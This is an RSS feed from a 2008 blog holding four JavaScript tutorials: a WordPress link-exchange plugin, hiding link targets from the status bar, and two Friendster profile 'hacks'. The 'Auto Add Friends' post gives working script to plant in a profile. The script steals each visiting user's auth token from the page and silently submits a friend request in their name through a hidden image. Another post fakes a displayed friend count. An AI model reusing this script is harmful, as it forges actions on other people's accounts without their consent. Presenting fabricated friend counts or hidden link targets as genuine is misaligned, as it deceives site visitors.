<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SmileyLover Blog &#187; Javascript</title>
	<atom:link href="http://blog.smileylover.com/category/javascript/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.smileylover.com</link>
	<description>Sharing Knowledge and Resources</description>
	<lastBuildDate>Sun, 04 Apr 2010 18:32:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Auto Add Friends Using (Javascript) Friendster Hacks</title>
		<link>http://blog.smileylover.com/auto-add-friends-using-javascript-friendster-hacks/</link>
		<comments>http://blog.smileylover.com/auto-add-friends-using-javascript-friendster-hacks/#comments</comments>
		<pubDate>Sat, 27 Sep 2008 22:19:16 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Friendster]]></category>
		<category><![CDATA[Javascript]]></category>

		<guid isPermaLink="false">http://blog.smileylover.com/?p=90</guid>
		<description><![CDATA[This is a little trick using javascript inserted to your profile in about me or who i want to meet sections. This script will add another Friendster user become your friends when they view your profile and not your friends yet Ok let&#8217;s go. For details how to insert and generate JS script to embed [...]]]></description>
			<content:encoded><![CDATA[<p>This is a little trick using javascript inserted to your profile in <strong>about me</strong> or <strong>who i want to meet</strong> sections.  This script will add another <a title="Social Site" href="http://friendster.com" target="_blank"><strong>Friendster</strong></a> user become your friends when they view your profile and not your friends yet <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Ok let&#8217;s go.  For details how to insert and generate JS script to embed in profile, please view my past post about <a href="http://blog.smileylover.com/boost-your-friends-using-javascript-friendster-hacks/"><strong>Boost Your Friends Using (Javascript) Friendster Hacks</strong></a> <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />   I assummed you already have file hosting account in <a title="Free File Hosting" href="http://www.fileave.com/" target="_blank">Fileave</a> or <a title="Free File Hosting" href="http://www.ripway.com/" target="_blank">Ripway</a>.  Copy this code below into your notepad and rename into, example <em>my-script.js</em> or if you already have previous js file in file hosting account, just edit it and save <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><span id="more-90"></span></p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p90code2'); return false;">View Code</a> JAVASCRIPT</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p902"><td class="code" id="p90code2"><pre class="javascript" style="font-family:monospace;"><span style="color: #003366; font-weight: bold;">var</span> afaimg <span style="color: #339933;">=</span> document.<span style="color: #660066;">createElement</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'span'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
afaimg.<span style="color: #660066;">id</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;addme&quot;</span><span style="color: #339933;">;</span>
document.<span style="color: #660066;">getElementsByTagName</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'head'</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#91;</span><span style="color: #CC0000;">0</span><span style="color: #009900;">&#93;</span>.<span style="color: #660066;">appendChild</span><span style="color: #009900;">&#40;</span>afaimg<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">function</span> afa<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #003366; font-weight: bold;">var</span> eadd <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;Your Email Address&quot;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> k <span style="color: #339933;">=</span> document.<span style="color: #660066;">getElementById</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;controlPanelButtons&quot;</span><span style="color: #009900;">&#41;</span>.<span style="color: #660066;">innerHTML</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> a <span style="color: #339933;">=</span> k.<span style="color: #660066;">slice</span><span style="color: #009900;">&#40;</span>k.<span style="color: #660066;">indexOf</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;authcode=&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> m <span style="color: #339933;">=</span> a.<span style="color: #660066;">slice</span><span style="color: #009900;">&#40;</span><span style="color: #CC0000;">9</span><span style="color: #339933;">,</span><span style="color: #CC0000;">39</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
document.<span style="color: #660066;">getElementById</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;addme&quot;</span><span style="color: #009900;">&#41;</span>.<span style="color: #660066;">innerHTML</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;&lt;img src=<span style="color: #000099; font-weight: bold;">\&quot;</span>http://www.friendster.com/addfriendrequest.php?authcode=&quot;</span><span style="color: #339933;">+</span>m<span style="color: #339933;">+</span><span style="color: #3366CC;">&quot;&amp;uid=&quot;</span><span style="color: #339933;">+</span>pageOwnerID<span style="color: #339933;">+</span><span style="color: #3366CC;">&quot;&amp;email=&quot;</span><span style="color: #339933;">+</span>eadd<span style="color: #339933;">+</span><span style="color: #3366CC;">&quot;&amp;firstname=&amp;lastname=&amp;friend=&amp;submit=1<span style="color: #000099; font-weight: bold;">\&quot;</span> width=<span style="color: #000099; font-weight: bold;">\&quot;</span>0<span style="color: #000099; font-weight: bold;">\&quot;</span> height=<span style="color: #000099; font-weight: bold;">\&quot;</span>0<span style="color: #000099; font-weight: bold;">\&quot;</span> /&gt;&quot;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span>attachOnLoadHandler<span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">function</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> afa<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><span style="color: #009900;">&#125;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> window.<span style="color: #000066;">onload</span> <span style="color: #339933;">=</span> <span style="color: #003366; font-weight: bold;">function</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> afa<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><span style="color: #009900;">&#125;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>

<p>Please change <strong>Your Email Address</strong> in line 5 with your real email address used in your Friendster account.  Now everytime another Friendster user view your profile they&#8217;ll add into your friends list <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.smileylover.com/auto-add-friends-using-javascript-friendster-hacks/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>WordPress Exchange Links Plugin &#8211; AJAX Version</title>
		<link>http://blog.smileylover.com/wordpress-exchange-links-plugin/</link>
		<comments>http://blog.smileylover.com/wordpress-exchange-links-plugin/#comments</comments>
		<pubDate>Fri, 26 Sep 2008 19:04:40 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[AJAX]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Localhost]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[wordpress exchange links plugin]]></category>
		<category><![CDATA[wordpress links exchange plugin]]></category>
		<category><![CDATA[wordpress seo plugin]]></category>

		<guid isPermaLink="false">http://blog.smileylover.com/?p=75</guid>
		<description><![CDATA[Let me introduce a new plugin called WpExLinks. This is my first plugin for WordPress that enable you to build your links network with other webmaster. This proccess now more easier in WordPress realm. We can automate the proccess and we&#8217;ll get some notification email in the end of proccess. Here are some feature from [...]]]></description>
			<content:encoded><![CDATA[<p>Let me introduce a new plugin called <strong>WpExLinks</strong>.  This is my first plugin for WordPress that enable you to build your links network with other webmaster.  This proccess now more easier in WordPress realm.  We can automate the proccess and we&#8217;ll get some notification email in the end of proccess.  Here are some feature from my plugin :</p>
<ol>
<li>Auto checking error if this fields were blank (name, email, website title, website URL, reciprocal URL, website description)</li>
<li>Checking for valid format of email, website url, reciprocal url</li>
<li>Checking for status reciprocal url before submitted</li>
<li>Auto blocked same domain submitted</li>
<li>Integrate AJAX CAPTCHA and AJAX sending form in user interface</li>
<li>Notification email for admin when some submit link</li>
<li>Edit Links Page! available</li>
<li>Widget already</li>
<li>Easy manage links (<em>delete, approve, unapprove, check reciprocal links</em>) from Options page</li>
</ol>
<p><span id="more-75"></span></p>
<p>Here are installation step :</p>
<ul>
<li>Make sure you upload a whole folder WpExLinks into your <em>wp-content/plugins</em>, please keep the structure files</li>
<li>Activate both WpExLinks plugin and WpExLinks widget from your <em>Dashboard</em></li>
<li>Create a new page, give a title as you like (ex. Exchange Links) and paste the code in the textarea and publish</li>
</ul>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p75code5'); return false;">View Code</a> PHP</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p755"><td class="code" id="p75code5"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;!--</span>wpExLinks<span style="color: #339933;">--&gt;</span></pre></td></tr></table></div>

<ul>
<li>Set WpExLinks options if you need from <em>Settings &gt; Wp Exchange Links</em> options page (default is enough to run)</li>
<li>Finished!  Now everyone want to do exchange links with you just refer to Exchange Links Page <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
</ul>
<p>Screenshot :</p>
<p><img src="http://i36.tinypic.com/2nr1o95.jpg" alt="WpExLinks options page.  You can set website url, title, description, and email address for notification.  Also you can manage all links from here." width="450" /></p>
<p><img src="http://i34.tinypic.com/11b5dzs.jpg" alt="Example WpExLinks page submit form" /></p>
<p>Because this is BETA version, so i need input from you all.  Please report bugs here.</p>
<p>History version:</p>
<p><em>Tested up to 2.6.5</em></p>
<ul>
<li>V1.0 &#8211; 28 Sept 2008, first release WpExLinks WordPress Plugin</li>
<li>V1.1 &#8211; 7 Oct 2008, Change to HTML email, repair bugs function show list without widget, fix admin options area, add description to anchor link as title/alt</li>
<li>V1.2 &#8211; 8 Oct, Fix HTML email, add Edit Links Page!, add permalink to Exchange Link Page in Options Page, etc . Please read changelog in readme.html for details.</li>
<li>V1.3 &#8211; 17 Oct, Change CAPTCHA method hope will fix compatibility issues, add new option to use captcha or not.  Please extract to wpExLinks folder and upload all files. </li>
<li>V1.4 &#8211; 10 Nov, Change default widget to display all links or use 0 to do it, Change AJAX system using  Simple AJAX Code-Kit (SACK) to avoid &#8220;Invalid Captcha&#8221; problem, Fixed minor bugs </li>
</ul>
<blockquote><p><a title="WpExLinks WordPress Plugin" href="http://downloads.wordpress.org/plugin/wp-ex-links.zip" target="_blank"><strong>Download Code</strong></a><br />
Now hosted by <a href="http://wordpress.org/extend/plugins/wp-ex-links/">WordPress</a> <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p></blockquote>
<p>Update note :<br />
You can show links list without widget, just add this code into your themes, not post/page textarea!  Anyway you can do it if you have execPHP plugin installed in your WordPress <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p75code6'); return false;">View Code</a> PHP</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p756"><td class="code" id="p75code6"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/function_exists"><span style="color: #990000;">function_exists</span></a><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'wpExLinksList'</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>wpExLinksList<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><span style="color: #009900;">&#125;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>Default will show links list in unordered list with div id=&#8221;wpExLinks&#8221; for setting in CSS and no limit number links, order by name, and ASCENDING.  Please refer to readme.html file for details.</p>
<p>Enjoy my plugin <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.smileylover.com/wordpress-exchange-links-plugin/feed/</wfw:commentRss>
		<slash:comments>253</slash:comments>
		</item>
		<item>
		<title>Hidden URL (Link) in Windows Status Bar with Javascript</title>
		<link>http://blog.smileylover.com/hidden-url-link-in-windows-status-bar-with-javascript/</link>
		<comments>http://blog.smileylover.com/hidden-url-link-in-windows-status-bar-with-javascript/#comments</comments>
		<pubDate>Sat, 13 Sep 2008 18:28:14 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Javascript]]></category>
		<category><![CDATA[hidden url link in status bar]]></category>

		<guid isPermaLink="false">http://blog.smileylover.com/?p=55</guid>
		<description><![CDATA[If we move our mouse over active link it will shown up the link address in windows status bar (fig.1). Now we can change this habbit to shown up in status bar as we like. This is perfectly for hide real address, maybe to hide your referral link Normally, if we want to make an [...]]]></description>
			<content:encoded><![CDATA[<p>If we move our mouse over active link it will shown up the link address in windows status bar (fig.1).  Now we can change this habbit to shown up in status bar as we like. This is perfectly for hide real address, maybe to hide your referral link <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<div class="wp-caption aligncenter" style="width: 506px"><img title="Normal Status Bar When Hover a Mouse to An Active Link" src="http://i35.tinypic.com/2r5483q.gif" alt="Normal Status Bar When Hover a Mouse to An Active Link" width="496" height="368" /><p class="wp-caption-text">Normal Status Bar When Hover a Mouse to An Active Link</p></div>
<p><span id="more-55"></span></p>
<p>Normally, if we want to make an active link we&#8217;ll set like this</p>
<blockquote><p>&lt;a href=&#8221;http://google.com&#8221;&gt;Link&lt;/a&gt;</p></blockquote>
<p>Now with javascript we change a little bite to</p>
<blockquote><p>&lt;a href=&#8221;#&#8221; onclick=&#8221;goToURL()&#8221;&gt;Link&lt;/a&gt;</p></blockquote>
<p>Now it&#8217;s javascript part</p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p55code10'); return false;">View Code</a> JAVASCRIPT</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p5510"><td class="code" id="p55code10"><pre class="javascript" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>script<span style="color: #339933;">&gt;</span>
<span style="color: #003366; font-weight: bold;">function</span> goToURL<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> window.<span style="color: #000066;">open</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;http://google.com/&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
<span style="color: #339933;">&lt;/</span>script<span style="color: #339933;">&gt;</span></pre></td></tr></table></div>

<p>It will open Google in new window.  If you prefer to open in the same window, you can change this code into</p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p55code11'); return false;">View Code</a> JAVASCRIPT</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p5511"><td class="code" id="p55code11"><pre class="javascript" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>script<span style="color: #339933;">&gt;</span>
<span style="color: #003366; font-weight: bold;">function</span> goToURL<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> window.<span style="color: #660066;">location</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;http://google.com/&quot;</span><span style="color: #339933;">;</span>  <span style="color: #009900;">&#125;</span>
<span style="color: #339933;">&lt;/</span>script<span style="color: #339933;">&gt;</span></pre></td></tr></table></div>

<p>Just set any URL like in the javascript code.  Now your status bar will look like this if any mouse over this link.</p>
<div class="wp-caption aligncenter" style="width: 482px"><img title="Hidden Link in Window Status Bar" src="http://i36.tinypic.com/2u61shd.gif" alt="Hidden Link in Window Status Bar" width="472" height="380" /><p class="wp-caption-text">Hidden Link in Window Status Bar</p></div>
<p>And this is a whole code in single file.</p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p55code12'); return false;">View Code</a> JAVASCRIPT</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p5512"><td class="code" id="p55code12"><pre class="javascript" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>a href<span style="color: #339933;">=</span><span style="color: #3366CC;">&quot;#&quot;</span> onclick<span style="color: #339933;">=</span><span style="color: #3366CC;">&quot;goToURL()&quot;</span><span style="color: #339933;">&gt;</span>Links <span style="color: #000066;">Open</span> <span style="color: #000066; font-weight: bold;">in</span> <span style="color: #003366; font-weight: bold;">NEW</span> window<span style="color: #339933;">&lt;/</span>a<span style="color: #339933;">&gt;</span>
&nbsp;
<span style="color: #339933;">&lt;</span>script<span style="color: #339933;">&gt;</span>
<span style="color: #003366; font-weight: bold;">function</span> goToURL<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> window.<span style="color: #000066;">open</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;http://google.com/&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
<span style="color: #339933;">&lt;/</span>script<span style="color: #339933;">&gt;</span>
<span style="color: #339933;">&lt;</span>br <span style="color: #339933;">/&gt;&lt;</span>br <span style="color: #339933;">/&gt;</span>
<span style="color: #339933;">&lt;</span>a href<span style="color: #339933;">=</span><span style="color: #3366CC;">&quot;#&quot;</span> onclick<span style="color: #339933;">=</span><span style="color: #3366CC;">&quot;goToURL2()&quot;</span><span style="color: #339933;">&gt;</span>Links <span style="color: #000066;">Open</span> <span style="color: #000066; font-weight: bold;">in</span> SAME window<span style="color: #339933;">&lt;/</span>a<span style="color: #339933;">&gt;</span>
&nbsp;
<span style="color: #339933;">&lt;</span>script<span style="color: #339933;">&gt;</span>
<span style="color: #003366; font-weight: bold;">function</span> goToURL2<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> window.<span style="color: #660066;">location</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;http://google.com/&quot;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
<span style="color: #339933;">&lt;/</span>script<span style="color: #339933;">&gt;</span></pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://blog.smileylover.com/hidden-url-link-in-windows-status-bar-with-javascript/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Boost Your Friends Using (Javascript)-Friendster Hacks</title>
		<link>http://blog.smileylover.com/boost-your-friends-using-javascript-friendster-hacks/</link>
		<comments>http://blog.smileylover.com/boost-your-friends-using-javascript-friendster-hacks/#comments</comments>
		<pubDate>Wed, 10 Sep 2008 20:22:12 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Friendster]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[hack friendster friend]]></category>
		<category><![CDATA[javascript friendster]]></category>

		<guid isPermaLink="false">http://blog.smileylover.com/?p=48</guid>
		<description><![CDATA[Remember first this is just for fun. I&#8217;m not responsible for any damage by using this script. Agree? If you did so let&#8217;s go. This is a simple javascript that insert into your profile in the about me or who i want to meet section to change your amount of friends. Perfectly for newbies in [...]]]></description>
			<content:encoded><![CDATA[<p>Remember first this is just for fun.  I&#8217;m not responsible for any damage by using this script.  Agree?  If you did so let&#8217;s go.  This is a simple javascript that insert into your profile in the <strong>about me</strong> or <strong>who i want to meet</strong> section to change your amount of friends.  Perfectly for newbies in <a href="http://friendster.com" target="_blank">friendster</a> who doesn&#8217;t have much friends yet <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>First open notepad or your favourite text editor and copy whole code below. Save as friends.js.</p>
<p><span id="more-48"></span></p>

<div class="wp_codebox_msgheader wp_codebox_hide"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p48code14'); return false;">View Code</a> JAVASCRIPT</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p4814"><td class="code" id="p48code14"><pre class="javascript" style="font-family:monospace;"><span style="color: #003366; font-weight: bold;">var</span> replaceLink <span style="color: #339933;">=</span> document.<span style="color: #660066;">createElement</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;a&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
replaceLink.<span style="color: #660066;">href</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;http://www.friendster.com/friends/&quot;</span><span style="color: #339933;">+</span>pageOwnerID<span style="color: #339933;">;</span>
replaceLink.<span style="color: #660066;">appendChild</span><span style="color: #009900;">&#40;</span>document.<span style="color: #660066;">createTextNode</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;View All (&lt;strong&gt;1000000&lt;/strong&gt;)&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> viewall <span style="color: #339933;">=</span> getElementsByClassName<span style="color: #009900;">&#40;</span>document.<span style="color: #660066;">getElementById</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;content_2&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span><span style="color: #3366CC;">&quot;div&quot;</span><span style="color: #339933;">,</span><span style="color: #3366CC;">&quot;viewall&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#91;</span><span style="color: #CC0000;">0</span><span style="color: #009900;">&#93;</span>.<span style="color: #660066;">getElementsByTagName</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;a&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#91;</span><span style="color: #CC0000;">0</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
<span style="color: #006600; font-style: italic;">//if exist</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span>viewall <span style="color: #339933;">!==</span> <span style="color: #003366; font-weight: bold;">null</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
viewall.<span style="color: #660066;">parentNode</span>.<span style="color: #660066;">replaceChild</span><span style="color: #009900;">&#40;</span>replaceLink<span style="color: #339933;">,</span>viewall<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #003366; font-weight: bold;">function</span> getElementsByClassName<span style="color: #009900;">&#40;</span>oElm<span style="color: #339933;">,</span>sTag<span style="color: #339933;">,</span>sClass<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #003366; font-weight: bold;">var</span> elm <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span>oElm<span style="color: #009900;">&#41;</span>oElm <span style="color: #339933;">=</span> document<span style="color: #339933;">;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span>sTag<span style="color: #009900;">&#41;</span>sTag <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;*&quot;</span><span style="color: #339933;">;</span>
<span style="color: #003366; font-weight: bold;">var</span> els <span style="color: #339933;">=</span> oElm.<span style="color: #660066;">getElementsByTagName</span><span style="color: #009900;">&#40;</span>sTag<span style="color: #009900;">&#41;</span> <span style="color: #339933;">||</span> document.<span style="color: #660066;">all</span><span style="color: #339933;">;</span>
<span style="color: #000066; font-weight: bold;">for</span> <span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">var</span> j<span style="color: #339933;">=</span><span style="color: #CC0000;">0</span><span style="color: #339933;">,</span>k<span style="color: #339933;">=</span>els.<span style="color: #660066;">length</span><span style="color: #339933;">;</span>j<span style="color: #339933;">&amp;</span>lt<span style="color: #339933;">;</span>k<span style="color: #339933;">;</span>j<span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #003366; font-weight: bold;">new</span> RegExp<span style="color: #009900;">&#40;</span>sClass<span style="color: #009900;">&#41;</span>.<span style="color: #660066;">test</span><span style="color: #009900;">&#40;</span>els<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span>.<span style="color: #660066;">className</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
elm.<span style="color: #660066;">push</span><span style="color: #009900;">&#40;</span>els<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #000066; font-weight: bold;">return</span> elm<span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></td></tr></table></div>

<p>Change bold number to suit for your needs.  Or you can download here.</p>
<blockquote><p><a title="Friendster Javascript Code" href="http://rapidshare.com/files/144207246/friendster-hackamountfriends.js" target="_blank">Download Javascript</a></p></blockquote>
<p>Second, upload to your hosting or using <a href="http://ripway.com"><strong>ripway</strong></a> for free.  After uploaded, copy direct link from your javascript to this site for generate code that insert into friendster profile.</p>
<blockquote><p><a href="http://jsesbreno.googlepages.com/Darylldelfin.html">http://jsesbreno.googlepages.com/Darylldelfin.html</a></p></blockquote>
<p>Copy generated results from this site and paste into your <strong>about me</strong> or <strong>who i want to meet</strong> section. Finished <img src='http://blog.smileylover.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Preview your profile now.</p>
<p>Source</p>
<blockquote><p><a href="http://friendstertalk.com/t20872-More-Friends.html">http://friendstertalk.com/t20872-More-Friends.html</a></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://blog.smileylover.com/boost-your-friends-using-javascript-friendster-hacks/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
	</channel>
</rss>

